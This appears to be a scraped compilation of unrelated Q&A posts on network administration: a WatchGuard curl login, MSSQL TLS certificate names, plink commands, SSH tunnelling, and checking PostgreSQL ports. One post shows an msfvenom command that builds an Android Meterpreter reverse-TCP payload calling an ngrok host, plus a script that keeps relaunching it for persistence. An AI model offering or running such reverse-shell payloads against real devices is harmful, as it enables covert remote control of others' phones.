I have been working on a batch script for some automation in the workplace. We have a Watchguard firewall and I need to sign in via batch. My present solution is sending a cURL POST request with the details needed. This is what I am calling:
set address="https://watchguard.<domain>:4100/wgcgi.cgi"
set data="fw_username=<username>&fw_password=<password>&fw_domain=<domain>&submit=Login&action=fw_logon&fw_logon_type=logon"
curl -k -m 10 -X POST -d %data% %address%
I have left the domain, username and password out for security reasons. This works almost all the time, however occasionally the cURL request hangs indefinitely despite the -m flag used. This has, so far, only occurred after the computer's 8 hour Watchguard session has expired though this doesn't always cause the issue. Once the issue shows up, it continues to happen until the machine is restarted.
This issue seems to be correlated with a similar issue on Internet Explorer. Internet Explorer hangs indefinitely while trying to open any webpage. Chrome, Edge and Firefox have no issues loading webpages. I was tipped off to the association between cURL and Internet Explorer because of this thread: https://curl.se/mail/lib-2012-10/0184.html
When I run curl -v -m 10 -X POST -d %data% %address% (with -v but no -k). Doing this gives me the following output:
* Trying <Firebox IP>...
* TCP_NODELAY set
* Connected to watchguard.<domain> (<Firebox IP>) port 4100 (#0)
* schannel: SSL/TLS connection with watchguard.<domain> port 4100 (step 1/3)
* schannel: checking server certificate revocation
When I run curl -v -k -m 10 -X POST -d %data% %address% (with -v). Doing this gives me the following output:
* Trying <Firebox IP>...
* TCP_NODELAY set
* Connected to watchguard.<domain> (<Firebox IP>) port 4100 (#0)
* schannel: SSL/TLS connection with watchguard.<domain> port 4100 (step 1/3)
* schannel: disabled server certificate revocation checks
* schannel: verifyhost setting prevents Schannel from comparing the supplied target name with the subject names in server certificates.
Is there something that I can do to make sure it goes through successfully?
cURL version:
curl 7.55.1 (Windows) libcurl/7.55.1 WinSSL
Release-Date: 2017-11-14, security patched: 2019-11-05
Protocols: dict file ftp ftps http https imap imaps pop3 pop3s smtp smtps telnet tftp
Features: AsynchDNS IPv6 Largefile SSPI Kerberos SPNEGO NTLM SSL
Watchguard version:
WatchguardFireBox M670 running Fireware OSv12.6.2.B631387
Related
I have an Android device at home that I use to develop on, and I'm connecting to it through my laptop with adb and scrcpy.
However, if I'm not home adb doesn't see the device. I made an apk for the device with msfvenom for reverse tcp like this:
msfvenom -p android/meterpreter/reverse_tcp LHOST=x.tcp.ngrok.io LPORT=(ngrok port) R > /home/user/reversetcp.apk
then I set up the reverse tcp handler in msfconsole:
msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 127.0.0.1
msf6 exploit(multi/handler) > exploit
After this I install and run the apk on my device, then meterpreter opens the session;
[*] Meterpreter session 1 opened (127.0.0.1:25565 -> 127.0.0.1:40146) at 2023-01-07 21:39:43 +0100
and the ngrok console shows up 1 connection (my device). But if I try to add the ngrok server to adb like this:
adb connect "ngrok address"
(there I tried the ngrok tcp link, and 127.0.0.1 with both ports, none of them works) I get the following error: failed to connect to '127.0.0.1:25565': Connection refused I could make a vpn on my local network, but the power usually goes down, so the vpn is a dead end. what am I doing wrong? or adb can't connect with ngrok?
My second issue is, that meterpreter randomly closes the session after around 8 minutes, and if the device powers off and on or if the power goes out the device switches from wifi to mobile data, and I can't reconnect. How can I make the apk run on startup and reconnect if there is a change in the internet connection?
Update: I made an shell script to reopen the reverse tcp apk after 10 mins or if there is internet connection, but it would be better if the connection wouldn't close, and the device isn't rooted, so I can't add the script to the folder to run on startup. Another way to keep the reverse tcp connection would be better, to open an reverse tcp (and keep it open), and if there is change in the internet connection then reconnect automatically.
Btw, here is the script that i wrote:
#!/bin/sh
# check for internet connection
while ! ping -c 1 google.com &> /dev/null
do
# wait 20 seconds before trying again
sleep 20
done
# run the activity
am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
# run the activity every 10 minutes
while true
do
sleep 600
am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
done
I am convinced that it is not possible to connect a device using reverse meterpreter shell because ADB requires a raw TCP connection rather than meterpreter shell.
You can use the ZeroTier application to create a private network for your devices that can be accessible via the internet. It functions similarly to VPN, but traffic is routed directly rather than through a centralized VPN server.
This post describes how to connect adb using TCPIP in detail.
Trying to configure TLS on my MSSQL connections following this article: https://learn.microsoft.com/en-us/sql/linux/sql-server-linux-encrypted-connections?view=sql-server-2017
The server-side configuration seems pretty straight-forward with minor differences in the container environment (e.g. systemctl doesn't exist so I kill/respawn pod):
systemctl stop mssql-server
cat /var/opt/mssql/mssql.conf
/opt/mssql/bin/mssql-conf set network.tlscert /var/opt/mssql/ssl/mssql.pem
/opt/mssql/bin/mssql-conf set network.tlskey /var/opt/mssql/ssl/mssqlprivkey.key
/opt/mssql/bin/mssql-conf set network.tlsprotocols 1.2
/opt/mssql/bin/mssql-conf set network.forceencryption 0
systemctl start mssql-server
So I took my PFX from my Windows CA and extracted the key and the client cert to key and pem files, added them to the location for persistent storage (/var/opt), ran the commands (seen above) and sql came back up.
I installed mssql-tools on a different machine and configured it in the trust-anchors to trust my CA.
However, when trying to test the connection (sqlcmd -N -S tcp:1.1.1.1,1433 -U user -P password), I get the error: SSL Provider: [error:14090086:SSL routines:ssl3_get_server_certificate:certificate verify failed:subject name does not match host name]
When I change the connection string to the DNS name, it works (sqlcmd -N -S tcp:mssql.mydomain.com,1433 -U user -P password) -- even though the IP address is listed as a subject alternative name on the cert.
Why are secure connections not working using the IP? What am I missing?
Different TLS client tools differently handle IP Address Subject Alternative Name type. Most Microsoft tools ignore iPAddress name type completely and require IP addresses to be listed as dNSName name type. Try to add IP Address to SAN extension as dNSName name type, it should work.
Goal: connect to AntMiner via SSH, and send poweroff command.
command: plink.exe -v -t -ssh antminer -l root -pw xxx poweroff
Connecting to 10.0.1.11 port 22
We claim version: SSH-2.0-PuTTY_Release_0.70
Server version: SSH-2.0-dropbear_2012.55
Using SSH protocol version 2
Using Diffie-Hellman with standard group "group14"
Doing Diffie-Hellman key exchange with hash SHA-1
Host key fingerprint is:
ssh-rsa 1039 xxx
Initialised AES-256 SDCTR client->server encryption
Initialised HMAC-SHA1 client->server MAC algorithm
Initialised AES-256 SDCTR server->client encryption
Initialised HMAC-SHA1 server->client MAC algorithm
Using username "root".
Sent password
Access granted
Opening session as main channel
Opened main channel
Allocated pty (ospeed 38400bps, ispeed 38400bps)
Started a shell/command
sh: poweroff: not found
Server sent command exit status 127
Disconnected: All channels closed
So the connection is working fine, it's the sending of the command that goes wrong.
Here's what SHOULD happen: (sent the command manually this time)
command: plink.exe -v -t -ssh antminer -l root -pw xxx
Connecting to 10.0.1.11 port 22
We claim version: SSH-2.0-PuTTY_Release_0.70
Server version: SSH-2.0-dropbear_2012.55
Using SSH protocol version 2
Using Diffie-Hellman with standard group "group14"
Doing Diffie-Hellman key exchange with hash SHA-1
Host key fingerprint is:
ssh-rsa 1039 xxx
Initialised AES-256 SDCTR client->server encryption
Initialised HMAC-SHA1 client->server MAC algorithm
Initialised AES-256 SDCTR server->client encryption
Initialised HMAC-SHA1 server->client MAC algorithm
Using username "root".
Sent password
Access granted
Opening session as main channel
Opened main channel
Allocated pty (ospeed 38400bps, ispeed 38400bps)
Started a shell/command
root#antMiner:~# poweroff
Broadcast message from root#antMiner (pts/0) (Thu Jan 25 19:23:19 2018):
The system is going down for system halt NOW!
root#antMiner:~# Server unexpectedly closed network connection
FATAL ERROR: Server unexpectedly closed network connection
Anybody have any idea WHY the sending of the command "poweroff" over plink fails?
This is covered in these questions:
Script via Plink in .bat behaves differently
sudo: command not found while using plink
So one easy solution is that you can try which poweroff in a normal session, to see where poweroff resides (can be /sbin/poweroff). And then use a full path in your plink command-line.
Though the right solution is to fix your startup scripts. See the links above.
As your command-line does not work even with the -t switch, your SSH server must execute a command in "exec" channel (used when a command is provided on command-line or using -m switch) differently than in a "shell" channel. This is rather unusual.
You can force plink to use "shell" channel (like in an interactive session) by using an input redirection:
echo poweroff| plink ...
I have a lab environment where I can do various operations(GET, PUT, DELETE etc).
I do these in Postman using a URL similar to:
http://1.2.3.4:8338/accounts
This returns JASON containing account information.
I can also get this information with the following curl statement:
curl https://1.2.3.4:8338/accounts -u admin:Jpassword
I now want to do it in a remore environmnet that I have to access through a jump server. I previously did something similar. I used SSH Tunnel Manager to create the connection. This is what it looked like. 1.1.1.1 is the jump server IP and 1.2.3.4 is the server I'm looking to connect to.
ssh -N -p 22 username#1.1.1.1 -o StrictHostKeyChecking=no -L 1.1.1.1:8080:1.2.3.4:443
I can then access through postman or my browser using the following URL:
https://127.0.0.1:8080/
I want to do the same with except I must specify port 8338. If I follow the same steps but use port 8338 instead of 8080 I get a 403 response when I try my url. If I change port 443 to 8338 I also get also get a 403.
I was wondering if this is likely to be an authentication issue or something I'm doing wrong with my tunnel.
Found the answer.
My problem was that I was using a wrong port. I should have had port 8338 instead of 443.
ssh -N -p 22 username#1.1.1.1 -o StrictHostKeyChecking=no -L 1.1.1.1:8080:1.2.3.4:8338
Now I can connect with this URL:
http://1.2.3.4:8080/accounts
Given an IP Address and port number, is it possible to check if the machine with that IP address has Postgresql listening on the specified port? If so, how?
I just want to obtain a boolean value of whether Postgresql is listening on the specified port of the specified machine.
You can use, for example, nmap tool:
=$ sudo nmap -v -p 5930 127.0.0.1
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-25 19:28 CEST
Initiating SYN Stealth Scan at 19:28
Scanning localhost (127.0.0.1) [1 port]
Discovered open port 5930/tcp on 127.0.0.1
Completed SYN Stealth Scan at 19:28, 0.03s elapsed (1 total ports)
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000045s latency).
PORT STATE SERVICE
5930/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
Raw packets sent: 1 (44B) | Rcvd: 2 (88B)
Alternatively you can just "SELECT 1" with psql, and check output:
=$ psql -h 127.0.0.1 -p 5930 -c "select 1"
?column?
----------
1
(1 row)
=$ psql -h 127.0.0.1 -p 5940 -c "select 1"
psql: could not connect to server: Connection refused
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 5940?
I think you need to define what you're trying to achieve better. Do you just want to know if anything is listening on a certain point? If PostgreSQL is listening on a given port? If PostgreSQL is running and actually accepting connections? If you can connect to PostgreSQL, authenticate successfully and issue queries?
One option is to invoke psql to connect to it and check the result code. Do not attempt to parse the output text, since that's subject to translation into different languages.
Better, use the client library for the language of your choice - psycopg2 for Python, PgJDBC for Java, the Pg gem for Ruby, DBD::Pg for Perl, nPgSQL for C#, etc. This is the approach I'd recommend. The SQLSTATE or exception details from any connection error will tell you more about why the connection failed - you'll be able to tell the difference between the server not listening, authentication failure, etc this way. For example, in Python:
import psycopg2
try:
conn = psycopg2.connect("host=localhost dbname=postgres")
conn.close()
except psycopg2.OperationalError as ex:
print("Connection failed: {0}".format(ex))
There are exception details in ex.pgcode (the SQLSTATE) to tell you more about errors that're generated server-side, like authentication failures; it'll be empty for client-side errors.
If you just want to see if something is listening on a given IP and TCP port, you can use netcat (*nix only), or a simple script in the language of your choice that creates a socket and does a connect() then closes the socket if it gets a successful response. For example, the following trivial Python script:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect(('localhost',5432))
s.close()
except socket.error as ex:
print("Connection failed with errno {0}: {1}".format(ex.errno, ex.strerror))
The same approach applies in any programming language, just the details of the socket library and error handling vary.
For some purposes it can also be useful to use the netstat tool to passively list which processes are listening on which network sockets. The built-in netstat on Windows is pretty brain-dead so you have to do more parsing of the output than with netstat for other platforms, but it'll still do the job. The presence of a socket in netstat doesn't mean that connecting to it will succeed, though; if the process has failed in some way that leaves it broken but still running (stuck in an infinite loop, blocked by a debugger, SIGSTOPed, etc) then it won't respond to an actual connection attempt.
In brief
In details
Fastest way is to use netcat aka nc with timeout ability as shared here
Results as 0/1 means postgres working/not-working
echo 'QUIT' | nc -w SECONDS YOUR_HOST PORT; echo $?
# eg
echo 'QUIT' | nc -w 1 localhost 5432; echo $?
Another also-faster way that works for me is to use telnet as discussed here.
echo -e '\x1dclose\x0d' | telnet YOUR_HOST PORT
# eg
echo -e '\x1dclose\x0d' | telnet localhost 5432